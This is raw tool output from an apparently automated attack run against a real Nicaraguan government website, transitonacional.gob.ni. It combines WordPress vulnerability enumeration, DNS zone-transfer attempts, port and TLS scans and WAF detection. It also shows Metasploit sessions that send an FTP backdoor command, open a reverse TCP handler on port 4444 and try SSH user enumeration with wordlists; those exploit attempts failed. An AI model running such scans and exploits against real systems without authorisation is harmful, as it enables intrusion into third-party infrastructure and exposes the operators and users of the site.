- Reference: https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
- [i] Fixed in: 4.4.16
- [+] WordPress theme in use: newsmag - v1.0
- [+] Name: newsmag - v1.0
- | Last updated: 2017-07-28T00:00:00.000Z
- | Location: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/
- [!] The version is out of date, the latest version is 2.3.8
- | Style URL: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/style.css
- | Theme Name: NewsMag
- | Theme URI: http://mythemeshop.com/themes/newsmag
- | Description: NewsMag is a three column, responsive WordPress magazine theme that is built for sites with lots ...
- | Author: MyThemeShop
- | Author URI: http://mythemeshop.com/
- [+] Enumerating plugins from passive detection ...
- | 6 plugins found:
- [+] Name: contact-form-7
- | Latest version: 5.0.3
- | Last updated: 2018-07-12T12:37:00.000Z
- | Location: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/
- [!] Directory listing is enabled: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/
- [!] We could not determine the version installed. All of the past known vulnerabilities will be output to allow you to do your own manual investigation.
- [!] Title: Contact Form 7 <= 3.7.1 - Security Bypass
- Reference: https://wpvulndb.com/vulnerabilities/7020
- Reference: http://www.securityfocus.com/bid/66381/
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2265
- [i] Fixed in: 3.7.2
- [!] Title: Contact Form 7 <= 3.5.2 - File Upload Remote Code Execution
- Reference: https://wpvulndb.com/vulnerabilities/7022
- Reference: http://packetstormsecurity.com/files/124154/
- [i] Fixed in: 3.5.3
- [+] Name: easy-collapse-accordion - v4.5
- | Latest version: 1.0 (up to date)
- | Last updated: 2013-12-26T00:50:00.000Z
- | Location: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/
- | Readme: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/README.md
- [!] Directory listing is enabled: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/
- [+] Name: itro-popup
- | Latest version: 5.0.2
- | Last updated: 2017-07-02T08:03:00.000Z
- | Location: http://www.transitonacional.gob.ni/wp-content/plugins/itro-popup/
- [+] Name: meteor-slides
- | Latest version: 1.5.6
- | Last updated: 2017-06-09T20:39:00.000Z
- | Location: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/
- | Readme: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/readme.md
- [!] Directory listing is enabled: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/
- [+] Name: transito_grafico
- | Location: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/
- [!] Directory listing is enabled: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/
- [+] Name: wp-super-cache
- | Latest version: 1.6.2
- | Last updated: 2018-06-19T09:49:00.000Z
- | Location: http://www.transitonacional.gob.ni/wp-content/plugins/wp-super-cache/
- [!] Directory listing is enabled: http://www.transitonacional.gob.ni/wp-content/plugins/wp-super-cache/
- [!] We could not determine the version installed. All of the past known vulnerabilities will be output to allow you to do your own manual investigation.
- [!] Title: WP-Super-Cache 1.3 - Remote Code Execution
- Reference: https://wpvulndb.com/vulnerabilities/6623
- Reference: http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/
- Reference: http://wordpress.org/support/topic/pwn3d
- Reference: http://blog.sucuri.net/2013/04/update-wp-super-cache-and-w3tc-immediately-remote-code-execution-vulnerability-disclosed.html
- [i] Fixed in: 1.3.1
- [!] Title: WP Super Cache 1.3 - trunk/wp-cache.php wp_nonce_url Function URI XSS
- Reference: https://wpvulndb.com/vulnerabilities/6624
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
- [i] Fixed in: 1.3.1
- [!] Title: WP Super Cache 1.3 - trunk/plugins/wptouch.php URI XSS
- Reference: https://wpvulndb.com/vulnerabilities/6625
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
- [i] Fixed in: 1.3.1
- [!] Title: WP Super Cache 1.3 - trunk/plugins/searchengine.php URI XSS
- Reference: https://wpvulndb.com/vulnerabilities/6626
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
- [i] Fixed in: 1.3.1
- [!] Title: WP Super Cache 1.3 - trunk/plugins/domain-mapping.php URI XSS
- Reference: https://wpvulndb.com/vulnerabilities/6627
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
- [i] Fixed in: 1.3.1
- [!] Title: WP Super Cache 1.3 - trunk/plugins/badbehaviour.php URI XSS
- Reference: https://wpvulndb.com/vulnerabilities/6628
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
- [i] Fixed in: 1.3.1
- [!] Title: WP Super Cache 1.3 - trunk/plugins/awaitingmoderation.php URI XSS
- Reference: https://wpvulndb.com/vulnerabilities/6629
- Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
- [i] Fixed in: 1.3.1
- [!] Title: WP Super Cache <= 1.4.2 - Stored Cross-Site Scripting (XSS)
- Reference: https://wpvulndb.com/vulnerabilities/7889
- Reference: http://blog.sucuri.net/2015/04/security-advisory-persistent-xss-in-wp-super-cache.html
- [i] Fixed in: 1.4.3
- [!] Title: WP Super Cache <= 1.4.4 - Cross-Site Scripting (XSS)
- Reference: https://wpvulndb.com/vulnerabilities/8197
- Reference: http://z9.io/2015/09/25/wp-super-cache-1-4-5/
- [i] Fixed in: 1.4.5
- [!] Title: WP Super Cache <= 1.4.4 - PHP Object Injection
- Reference: https://wpvulndb.com/vulnerabilities/8198
- Reference: http://z9.io/2015/09/25/wp-super-cache-1-4-5/
- [i] Fixed in: 1.4.5
- [+] Finished: Wed Aug 8 10:17:00 2018
- [+] Elapsed time: 00:08:58
- [+] Requests made: 128
- [+] Memory used: 125.609 MB
- #######################################################################################################################################
- dnsenum VERSION:1.2.4
- ----- transitonacional.gob.ni -----
- Host's addresses:
- __________________
- transitonacional.gob.ni. 14399 IN A 50.87.39.91
- Name Servers:
- ______________
- ns1.rhostbh.com. 11380 IN A 162.159.24.66
- ns2.rhostbh.com. 14399 IN A 162.159.25.91
- Mail (MX) Servers:
- ___________________
- transitonacional.gob.ni. 14391 IN A 50.87.39.91
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for transitonacional.gob.ni on ns1.rhostbh.com ...
- Trying Zone Transfer for transitonacional.gob.ni on ns2.rhostbh.com ...
- brute force file not specified, bay.
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-08 10:04 EDT
- Warning: 50.87.39.91 giving up on port because retransmission cap hit (2).
- Nmap scan report for transitonacional.gob.ni (50.87.39.91)
- Host is up (0.83s latency).
- rDNS record for 50.87.39.91: 50-87-39-91.unifiedlayer.com
- Not shown: 453 closed ports, 11 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 465/tcp open smtps
- 587/tcp open submission
- 993/tcp open imaps
- 995/tcp open pop3s
- 8080/tcp open http-proxy
- 8443/tcp open https-alt
- Nmap done: 1 IP address (1 host up) scanned in 8.93 seconds
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-08 10:04 EDT
- Nmap scan report for transitonacional.gob.ni (50.87.39.91)
- Host is up.
- rDNS record for 50.87.39.91: 50-87-39-91.unifiedlayer.com
- PORT STATE SERVICE
- 53/udp open|filtered domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 137/udp open|filtered netbios-ns
- 138/udp open|filtered netbios-dgm
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- Nmap done: 1 IP address (1 host up) scanned in 4.07 seconds
- #######################################################################################################################################
- + -- --=[Port 21 opened... running tests...
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-08 10:04 EDT
- Nmap scan report for transitonacional.gob.ni (50.87.39.91)
- Host is up (0.16s latency).
- rDNS record for 50.87.39.91: 50-87-39-91.unifiedlayer.com
- PORT STATE SERVICE VERSION
- 21/tcp filtered ftp
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 ... 30
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 16.67 seconds
- +-------------------------------------------------------+
- | METASPLOIT by Rapid7 |
- +---------------------------+---------------------------+
- | __________________ | |
- | ==c(______(o(______(_() | |""""""""""""|======[*** |
- | )=\ | | EXPLOIT \ |
- | // \\ | |_____________\_______ |
- | // \\ | |==[msf >]============\ |
- | // \\ | |______________________\ |
- | // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
- | // \\ | ********************* |
- +---------------------------+---------------------------+
- | o O o | \'\/\/\/'/ |
- | o O | )======( |
- | o | .' LOOT '. |
- | |^^^^^^^^^^^^^^|l___ | / _||__ \ |
- | | PAYLOAD |""\___, | / (_||_ \ |
- | |________________|__|)__| | | __||_) | |
- | |(@)(@)"""**|(@)(@)**|(@) | " || " |
- | = = = = = = = = = = = = | '--------------' |
- +---------------------------+---------------------------+
- =[ metasploit v4.17.3-dev ]
- + -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
- + -- --=[ 538 payloads - 41 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- RHOST => transitonacional.gob.ni
- RHOSTS => transitonacional.gob.ni
- [+] 50.87.39.91:21 - FTP Banner: '220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 3 of 1000 allowed.\x0d\x0a220-Local time is now 08:05. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a'
- [*] transitonacional.gob.ni:21 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] transitonacional.gob.ni:21 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] transitonacional.gob.ni:21 - Banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
- 220-You are user number 3 of 1000 allowed.
- 220-Local time is now 08:05. Server port: 21.
- 220-This is a private system - No anonymous login
- 220-IPv6 connections are also welcome on this server.
- 220 You will be disconnected after 15 minutes of inactivity.
- [*] transitonacional.gob.ni:21 - USER: 331 User KuK:) OK. Password required
- [*] Exploit completed, but no session was created.
- [*] Started reverse TCP double handler on 10.211.1.13:4444
- [*] transitonacional.gob.ni:21 - Sending Backdoor Command
- [*] Exploit completed, but no session was created.
- + -- --=[Port 22 opened... running tests...
- [exception] did not receive banner.
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-08 10:06 EDT
- Nmap scan report for transitonacional.gob.ni (50.87.39.91)
- Host is up (0.083s latency).
- rDNS record for 50.87.39.91: 50-87-39-91.unifiedlayer.com
- PORT STATE SERVICE VERSION
- 22/tcp filtered ssh
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 ... 30
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 21.72 seconds
- .:okOOOkdc' 'cdkOOOko:.
- .xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
- :OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
- 'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
- oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo
- dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx
- lOOOOOOOO. ;d; ,OOOOOOOOl
- .OOOOOOOO. .; ; ,OOOOOOOO.
- cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc
- oOOOOOO. .OOOO. :OOOO. ,OOOOOOo
- lOOOOO. .OOOO. :OOOO. ,OOOOOl
- ;OOOO' .OOOO. :OOOO. ;OOOO;
- .dOOo .OOOOocccxOOOO. xOOd.
- ,kOl .OOOOOOOOOOOOO. .dOk,
- :kk;.OOOOOOOOOOOOO.cOk:
- ;kOOOOOOOOOOOOOOOk:
- ,xOOOOOOOOOOOx,
- .lOOOOOOOl.
- ,dOd,
- .
- =[ metasploit v4.17.3-dev ]
- + -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
- + -- --=[ 538 payloads - 41 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- USER_FILE => /brutex/wordlists/simple-users.txt
- RHOSTS => transitonacional.gob.ni
- RHOST => transitonacional.gob.ni
- [+] 50.87.39.91:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
- [*] transitonacional.gob.ni:22 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
- [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
- [+] 50.87.39.91:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
- [*] transitonacional.gob.ni:22 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- #######################################################################################################################################
- ERROR:root:Site http://transitonacional.gob.ni appears to be down
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://transitonacional.gob.ni
- http://transitonacional.gob.ni [301 Moved Permanently] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[50.87.39.91], PHP[5,5.2.17], RedirectLocation[http://www.transitonacional.gob.ni/], UncommonHeaders[x-acc-exp,x-proxy-cache], X-Powered-By[PHP/5.2.17], nginx[1.14.0]
- http://www.transitonacional.gob.ni/ [200 OK] Country[UNITED STATES][US], Email[info@transitonacional.gob.ni,transitonacional@gmail.com], Facebook-Plugin[likebox], Frame, Google-API[ajax/libs/jquery/1/jquery.min.js], Google-Analytics[Universal][UA-53950533-1], HTML5, HTTPServer[nginx/1.14.0], IP[50.87.39.91], JQuery[1.11.1,1.7.1], Modernizr, PHP[5,5.2.17], Script[text/javascript], Title[Dirección de Seguridad de Transito], UncommonHeaders[wp-super-cache,x-acc-exp,x-proxy-cache], WordPress[4.4.2], WordpressSuperCache, X-Powered-By[PHP/5.2.17], YouTube, nginx[1.14.0]
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://www.transitonacional.gob.ni...
- ________________________________________ SITE INFO ________________________________________
- IP Title
- 50.87.39.91 Dirección de Seguridad de Transito
- _________________________________________ VERSION _________________________________________
- Name Versions Type
- WordPress 4.4.2 CMS
- PHP 5.2.17 Platform
- nginx 1.14.0 Platform
- OpenBSD 4.9 OS
- _______________________________________ INTERESTING _______________________________________
- URL Note Type
- /readme.html Wordpress readme Interesting
- /readme.html Readme file Interesting
- /robots.txt robots.txt index Interesting
- /login/ Login Page Interesting
- __________________________________________ TOOLS __________________________________________
- Name Link Software
- wpscan https://github.com/wpscanteam/wpscan WordPress
- CMSmap https://github.com/Dionach/CMSmap WordPress
- _____________________________________ VULNERABILITIES _____________________________________
- Affected #Vulns Link
- WordPress 4.4.2 1 http://cvedetails.com/version/200899
- ___________________________________________________________________________________________
- Time: 305.0 sec Urls: 351 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 301 Moved Permanently
- Server: nginx/1.14.0
- Date: Wed, 08 Aug 2018 14:15:37 GMT
- Content-Type: text/html; charset=UTF-8
- Connection: keep-alive
- X-Powered-By: PHP/5.2.17
- Vary: Cookie,Accept-Encoding
- Location: http://www.transitonacional.gob.ni/
- #######################################################################################################################################
- [+] Screenshot saved to /usr/share/sniper/loot/transitonacional.gob.ni/screenshots/transitonacional.gob.ni-port80.jpg
- + -- --=[Port 110 opened... running tests...
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-08 10:15 EDT
- Nmap scan report for transitonacional.gob.ni (50.87.39.91)
- Host is up (0.38s latency).
- rDNS record for 50.87.39.91: 50-87-39-91.unifiedlayer.com
- PORT STATE SERVICE VERSION
- 110/tcp filtered pop3
- Too many fingerprints match this host to give specific OS details
- Network Distance: 1 hop
- TRACEROUTE (using port 443/tcp)
- HOP RTT ADDRESS
- 1 612.95 ms 50-87-39-91.unifiedlayer.com (50.87.39.91)
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://transitonacional.gob.ni
- Generic Detection results:
- The site https://transitonacional.gob.ni seems to be behind a WAF or some sort of security solution
- Reason: Blocking is being done at connection/packet level.
- Number of requests: 10
- AVAILABLE PLUGINS
- -----------------
- PluginCertInfo
- PluginHeartbleed
- PluginSessionRenegotiation
- PluginSessionResumption
- PluginCompression
- PluginOpenSSLCipherSuites
- PluginHSTS
- PluginChromeSha1Deprecation
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- transitonacional.gob.ni:443 => 50.87.39.91:443
- SCAN RESULTS FOR TRANSITONACIONAL.GOB.NI:443 - 50.87.39.91:443
- --------------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 2d9ccc86afb7bba2a486e3d1dd7816596ebd3365
- Common Name: *.rhostbh.com
- Issuer: COMODO RSA Domain Validation Secure Server CA
- Serial Number: 8DB1D4FBDB8DE1FC9A9AA0BEBEB4BADC
- Not Before: Feb 9 00:00:00 2016 GMT
- Not After: Feb 8 23:59:59 2019 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 4096 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['*.rhostbh.com', 'rhostbh.com']}
- * Certificate - Trust:
- Hostname Validation: FAILED - Certificate does NOT match transitonacional.gob.ni
- Google CA Store (09/2015): OK - Certificate is trusted
- Java 6 CA Store (Update 65): OK - Certificate is trusted
- Microsoft CA Store (09/2015): OK - Certificate is trusted
- Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
- Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
- Certificate Chain Received: ['*.rhostbh.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * Session Resumption:
- With Session IDs: PARTIALLY SUPPORTED (3 successful, 0 failed, 2 errors, 5 total attempts). Try --resum_rate.
- ERROR #1: timeout - timed out
- ERROR #2: timeout - timed out
- With TLS Session Tickets: OK - Supported
- * SSLV2 Cipher Suites:
- Undefined - An unexpected error happened:
- RC4-MD5 timeout - timed out
- RC2-CBC-MD5 timeout - timed out
- IDEA-CBC-MD5 timeout - timed out
- EXP-RC4-MD5 timeout - timed out
- EXP-RC2-CBC-MD5 timeout - timed out
- DES-CBC3-MD5 timeout - timed out
- DES-CBC-MD5 timeout - timed out
- * SSLV3 Cipher Suites:
- Undefined - An unexpected error happened:
- SRP-RSA-3DES-EDE-CBC-SHA timeout - timed out
- SRP-DSS-3DES-EDE-CBC-SHA timeout - timed out
- SRP-3DES-EDE-CBC-SHA timeout - timed out
- SEED-SHA timeout - timed out
- RC4-SHA timeout - timed out
- RC4-MD5 timeout - timed out
- PSK-RC4-SHA timeout - timed out
- PSK-AES128-CBC-SHA timeout - timed out
- PSK-3DES-EDE-CBC-SHA timeout - timed out
- NULL-SHA256 timeout - timed out
- NULL-SHA timeout - timed out
- NULL-MD5 timeout - timed out
- IDEA-CBC-SHA timeout - timed out
- EXP-RC4-MD5 timeout - timed out
- EXP-RC2-CBC-MD5 timeout - timed out
- EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
- EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
- EXP-DES-CBC-SHA timeout - timed out
- EXP-ADH-RC4-MD5 timeout - timed out
- EXP-ADH-DES-CBC-SHA timeout - timed out
- EDH-RSA-DES-CBC3-SHA timeout - timed out
- EDH-RSA-DES-CBC-SHA timeout - timed out
- EDH-DSS-DES-CBC3-SHA timeout - timed out
- EDH-DSS-DES-CBC-SHA timeout - timed out
- ECDHE-RSA-RC4-SHA timeout - timed out
- ECDHE-RSA-NULL-SHA timeout - timed out
- ECDHE-RSA-DES-CBC3-SHA timeout - timed out
- ECDHE-ECDSA-RC4-SHA timeout - timed out
- ECDHE-ECDSA-NULL-SHA timeout - timed out
- ECDHE-ECDSA-DES-CBC3-SHA timeout - timed out
- ECDH-RSA-RC4-SHA timeout - timed out
- ECDH-RSA-NULL-SHA timeout - timed out
- ECDH-RSA-DES-CBC3-SHA timeout - timed out
- ECDH-RSA-AES128-SHA256 timeout - timed out
- ECDH-RSA-AES128-GCM-SHA256 timeout - timed out
- ECDH-ECDSA-RC4-SHA timeout - timed out
- ECDH-ECDSA-NULL-SHA timeout - timed out
- ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
- ECDH-ECDSA-AES128-SHA timeout - timed out
- DH-RSA-DES-CBC3-SHA timeout - timed out
- DH-RSA-DES-CBC-SHA timeout - timed out
- DH-DSS-DES-CBC3-SHA timeout - timed out
- DH-DSS-DES-CBC-SHA timeout - timed out
- DES-CBC3-SHA timeout - timed out
- DES-CBC-SHA timeout - timed out
- CAMELLIA128-SHA timeout - timed out
- AES128-SHA256 timeout - timed out
- AES128-SHA timeout - timed out
- AES128-GCM-SHA256 timeout - timed out
- AECDH-RC4-SHA timeout - timed out
- AECDH-NULL-SHA timeout - timed out
- AECDH-DES-CBC3-SHA timeout - timed out
- ADH-RC4-MD5 timeout - timed out
- ADH-DES-CBC3-SHA timeout - timed out
- ADH-DES-CBC-SHA timeout - timed out
- ADH-CAMELLIA128-SHA timeout - timed out
- ADH-AES128-SHA timeout - timed out
- SCAN COMPLETED IN 108.13 S
- --------------------------
- Version: 1.11.11-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 50.87.39.91
- Testing SSL server transitonacional.gob.ni on port 443 using SNI name transitonacional.gob.ni
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits AES128-SHA
- Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits AES128-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 4096
- Subject: *.rhostbh.com
- Altnames: DNS:*.rhostbh.com, DNS:rhostbh.com
- Issuer: COMODO RSA Domain Validation Secure Server CA
- Not valid before: Feb 9 00:00:00 2016 GMT
- Not valid after: Feb 8 23:59:59 2019 GMT
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://transitonacional.gob.ni:8080
- The site http://transitonacional.gob.ni:8080 is behind a IBM Web Application Security
- Number of requests: 3
- http://transitonacional.gob.ni:8080/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 ERROR: Socket error Hostname not known: transitonacional.gob.ni
- http://transitonacional.gob.ni:8080 [301 Moved Permanently] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[50.87.39.91], PHP[5,5.2.17], RedirectLocation[http://www.transitonacional.gob.ni/], UncommonHeaders[x-acc-exp,x-proxy-cache], X-Powered-By[PHP/5.2.17], nginx[1.14.0]
- http://www.transitonacional.gob.ni/ [200 OK] Country[UNITED STATES][US], Email[info@transitonacional.gob.ni,transitonacional@gmail.com], Facebook-Plugin[likebox], Frame, Google-API[ajax/libs/jquery/1/jquery.min.js], Google-Analytics[Universal][UA-53950533-1], HTML5, HTTPServer[nginx/1.14.0], IP[50.87.39.91], JQuery[1.11.1,1.7.1], Modernizr, PHP[5,5.2.17], Script[text/javascript], Title[Dirección de Seguridad de Transito], UncommonHeaders[wp-super-cache,x-acc-exp,x-proxy-cache], WordPress, WordpressSuperCache, X-Powered-By[PHP/5.2.17], YouTube, nginx[1.14.0]
- Version: 1.11.11-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 50.87.39.91
- Testing SSL server transitonacional.gob.ni on port 8080 using SNI name transitonacional.gob.ni
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Session renegotiation not supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-08 10:23 EDT
- Nmap scan report for transitonacional.gob.ni (50.87.39.91)
- Host is up (0.21s latency).
- rDNS record for 50.87.39.91: 50-87-39-91.unifiedlayer.com
- PORT STATE SERVICE VERSION
- 8080/tcp filtered http-proxy
- Too many fingerprints match this host to give specific OS details
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 ... 30
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 16.57 seconds
- Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
- EFLAGS: 00010046
- eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
- esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
- ds: 0018 es: 0018 ss: 0018
- Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
- Stack: 90909090990909090990909090
- 90909090990909090990909090
- 90909090.90909090.90909090
- 90909090.90909090.90909090
- 90909090.90909090.09090900
- 90909090.90909090.09090900
- ..........................
- cccccccccccccccccccccccccc
- cccccccccccccccccccccccccc
- ccccccccc.................
- cccccccccccccccccccccccccc
- cccccccccccccccccccccccccc
- .................ccccccccc
- cccccccccccccccccccccccccc
- cccccccccccccccccccccccccc
- ..........................
- ffffffffffffffffffffffffff
- ffffffff..................
- ffffffffffffffffffffffffff
- ffffffff..................
- ffffffff..................
- ffffffff..................
- Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
- Aiee, Killing Interrupt handler
- Kernel panic: Attempted to kill the idle task!
- In swapper task - not syncing
- =[ metasploit v4.17.3-dev ]
- + -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
- + -- --=[ 538 payloads - 41 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- RHOSTS => transitonacional.gob.ni
- RHOST => transitonacional.gob.ni
- [-] WAR file not found
- [*] Auxiliary module execution completed
